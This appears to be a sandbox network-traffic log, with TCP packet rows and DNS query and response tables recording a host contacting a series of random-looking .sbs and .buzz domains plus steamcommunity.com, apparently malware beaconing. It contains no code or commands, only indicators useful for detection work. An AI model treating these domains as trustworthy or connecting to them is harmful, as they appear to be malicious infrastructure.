                                                                                                                                                                                      Oct 13, 2024 01:44:13.363854885 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.809506893 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.809756041 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.809938908 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813750982 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813750982 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813797951 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813826084 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845181942 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845277071 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845393896 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845648050 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845680952 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.361943960 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.362224102 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.364353895 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.364386082 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.364682913 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.366183043 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.366223097 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.366266012 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.796938896 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797209978 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797297001 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797382116 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797431946 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797483921 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797498941 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.829365969 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:14.829421997 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.829514027 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:14.829833031 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:14.829864979 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.332447052 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.332555056 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.334639072 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.334671021 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.334979057 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.336587906 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.336587906 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.336671114 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.767852068 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.768070936 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.768151999 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.768219948 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.768219948 CEST49707443192.168.2.5172.67.152.13
                                                                                                                                                                                      Oct 13, 2024 01:44:15.768264055 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.768291950 CEST44349707172.67.152.13192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.785090923 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:15.785151958 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:15.785243988 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:15.785676956 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:15.785692930 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.105307102 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.105382919 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.106791019 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.106803894 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.107217073 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.108187914 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.108223915 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.108290911 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.530570984 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.530852079 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.530989885 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.531265020 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.531301975 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.531327963 CEST49710443192.168.2.5172.67.205.156
                                                                                                                                                                                      Oct 13, 2024 01:44:17.531346083 CEST44349710172.67.205.156192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.553216934 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:17.553241014 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:17.553340912 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:17.553694010 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:17.553706884 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:18.054775000 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:18.054858923 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:18.057035923 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:18.057048082 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:18.057390928 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:18.065829039 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:18.065849066 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:18.065923929 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:19.560684919 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:19.560931921 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:19.561296940 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:19.561400890 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:19.561402082 CEST49714443192.168.2.5172.67.140.193
                                                                                                                                                                                      Oct 13, 2024 01:44:19.561455011 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:19.561481953 CEST44349714172.67.140.193192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:19.576169968 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:19.576203108 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:19.576378107 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:19.576673031 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:19.576688051 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.053814888 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.054032087 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.057594061 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.057627916 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.057986975 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.069257021 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.069309950 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.069411993 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.503266096 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.503551006 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.503956079 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.503956079 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.504097939 CEST49724443192.168.2.5172.67.173.224
                                                                                                                                                                                      Oct 13, 2024 01:44:20.504143000 CEST44349724172.67.173.224192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:20.536762953 CEST49729443192.168.2.5104.21.79.35
Oct 13, 2024 01:44:20.536820889 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:20.537055969 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:20.537345886 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:20.537374020 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.017476082 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.017673016 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.019654036 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.019665003 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.019999027 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.021636963 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.021702051 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.021743059 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.464092970 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.464202881 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.464255095 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.464390993 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.464401960 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.464422941 CEST | 49729 | 443 | 192.168.2.5 | 104.21.79.35
Oct 13, 2024 01:44:21.464431047 CEST | 443 | 49729 | 104.21.79.35 | 192.168.2.5
Oct 13, 2024 01:44:21.483697891 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.483730078 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:21.483788013 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.484026909 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.484035969 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:21.974256992 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:21.974390030 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.976464033 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.976497889 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:21.976921082 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:21.977972031 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.978013992 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:21.978075027 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:22.318789959 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:22.318908930 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:22.318963051 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:22.319161892 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:22.319181919 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:22.319205046 CEST | 49738 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:22.319210052 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:22.330307961 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:22.330348015 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:22.330432892 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:22.330774069 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:22.330786943 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.045537949 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.045651913 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.046963930 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.046967030 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.047488928 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.048578024 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.095411062 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.583533049 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.583561897 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.583583117 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.583708048 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.583708048 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.583734035 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.583784103 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.713093996 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.713162899 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.713210106 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.713222980 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.713368893 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.713368893 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.719290018 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.719357014 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.719403982 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.719494104 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.719499111 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.719553947 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.719600916 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.719644070 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.719656944 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.719669104 CEST | 49744 | 443 | 192.168.2.5 | 104.102.49.254
Oct 13, 2024 01:44:23.719674110 CEST | 443 | 49744 | 104.102.49.254 | 192.168.2.5
Oct 13, 2024 01:44:23.738185883 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:23.738229036 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:23.738322973 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:23.738616943 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:23.738646984 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.242212057 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.242292881 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.243731976 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.243737936 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.244059086 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.245528936 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.245579958 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.245599985 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377336979 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377403021 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377444029 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377463102 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.377471924 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377557993 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377625942 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.377625942 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.377921104 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.377921104 CEST | 49751 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.377948046 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.377960920 CEST | 443 | 49751 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.467416048 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.467431068 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.467521906 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.467863083 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.467871904 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.964510918 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.964757919 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.965886116 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.965903044 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.966240883 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:24.968384981 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.968416929 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:24.968475103 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:25.412169933 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:25.412278891 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:25.412406921 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:25.412630081 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:25.412645102 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5
Oct 13, 2024 01:44:25.412667036 CEST | 49757 | 443 | 192.168.2.5 | 104.21.53.8
Oct 13, 2024 01:44:25.412672997 CEST | 443 | 49757 | 104.21.53.8 | 192.168.2.5

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 01:44:12.464704037 CEST | 56173 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:12.475267887 CEST | 53 | 56173 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:13.830190897 CEST | 52356 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:13.842127085 CEST | 53 | 52356 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:14.803554058 CEST | 54113 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:14.811793089 CEST | 53 | 54113 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:14.812869072 CEST | 63561 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:14.826031923 CEST | 53 | 63561 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:15.770723104 CEST | 57119 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:15.782776117 CEST | 53 | 57119 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:17.533349991 CEST | 63184 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:17.544902086 CEST | 53 | 63184 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:19.562794924 CEST | 59139 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:19.575234890 CEST | 53 | 59139 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:20.524056911 CEST | 50968 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:20.535840988 CEST | 53 | 50968 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:21.465912104 CEST | 60232 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:21.483051062 CEST | 53 | 60232 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:22.322777987 CEST | 61254 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:22.329580069 CEST | 53 | 61254 | 1.1.1.1 | 192.168.2.5
Oct 13, 2024 01:44:23.725709915 CEST | 61431 | 53 | 192.168.2.5 | 1.1.1.1
Oct 13, 2024 01:44:23.737500906 CEST | 53 | 61431 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 01:44:12.464704037 CEST | 192.168.2.5 | 1.1.1.1 | 0x52 | Standard query (0) | proclaimykn.buzz | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:13.830190897 CEST | 192.168.2.5 | 1.1.1.1 | 0x192d | Standard query (0) | mathcucom.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:14.803554058 CEST | 192.168.2.5 | 1.1.1.1 | 0xf7b0 | Standard query (0) | allocatinow.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:14.812869072 CEST | 192.168.2.5 | 1.1.1.1 | 0xd346 | Standard query (0) | enlargkiw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:15.770723104 CEST | 192.168.2.5 | 1.1.1.1 | 0x2b20 | Standard query (0) | resinedyw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:17.533349991 CEST | 192.168.2.5 | 1.1.1.1 | 0x3305 | Standard query (0) | vennurviot.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:19.562794924 CEST | 192.168.2.5 | 1.1.1.1 | 0xa658 | Standard query (0) | ehticsprocw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:20.524056911 CEST | 192.168.2.5 | 1.1.1.1 | 0x4d3f | Standard query (0) | condifendteu.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:21.465912104 CEST | 192.168.2.5 | 1.1.1.1 | 0xccdb | Standard query (0) | drawwyobstacw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:22.322777987 CEST | 192.168.2.5 | 1.1.1.1 | 0x47b9 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:23.725709915 CEST | 192.168.2.5 | 1.1.1.1 | 0x8468 | Standard query (0) | sergei-esenin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 01:44:12.475267887 CEST | 1.1.1.1 | 192.168.2.5 | 0x52 | No error (0) | proclaimykn.buzz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:12.475267887 CEST | 1.1.1.1 | 192.168.2.5 | 0x52 | No error (0) | proclaimykn.buzz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:13.842127085 CEST | 1.1.1.1 | 192.168.2.5 | 0x192d | No error (0) | mathcucom.sbs | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:13.842127085 CEST | 1.1.1.1 | 192.168.2.5 | 0x192d | No error (0) | mathcucom.sbs | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:14.811793089 CEST | 1.1.1.1 | 192.168.2.5 | 0xf7b0 | Name error (3) | allocatinow.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:14.826031923 CEST | 1.1.1.1 | 192.168.2.5 | 0xd346 | No error (0) | enlargkiw.sbs | | 172.67.152.13 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:14.826031923 CEST | 1.1.1.1 | 192.168.2.5 | 0xd346 | No error (0) | enlargkiw.sbs | | 104.21.33.249 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:15.782776117 CEST | 1.1.1.1 | 192.168.2.5 | 0x2b20 | No error (0) | resinedyw.sbs | | 172.67.205.156 | A (IP address) | IN (0x0001) | false
